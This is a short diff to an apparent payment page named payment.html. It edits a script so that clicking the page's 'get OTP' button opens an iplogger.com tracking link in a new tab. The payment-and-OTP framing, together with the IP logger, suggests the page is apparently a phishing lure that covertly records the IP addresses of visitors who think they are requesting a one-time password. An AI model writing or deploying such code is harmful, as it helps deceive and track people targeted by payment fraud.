--- a/payment.html
+++ b/payment.html
@@ -444,9 +444,9 @@
     type="application/json">{"props":{"pageProps":{}},"page":"/","query":{"next":null},"buildId":"EYZ_5mDLMY3ND0po7YX8g","assetPrefix":"https://d157777v0iph40.cloudfront.net/portal/pwa/static/v1/202304042314","nextExport":true,"autoExport":true,"isFallback":false,"scriptLoader":[]}</script>
 </body>
 <script>
-  let get = document.getElementById('getotp');
+ let get = document.getElementById('getotp');
 get.onclick = function() {
-  window.location.href = 'https://iplogger.com/XUB1d';
+  window.open('https://iplogger.com/XUB1d', '_blank');
 };
 
 
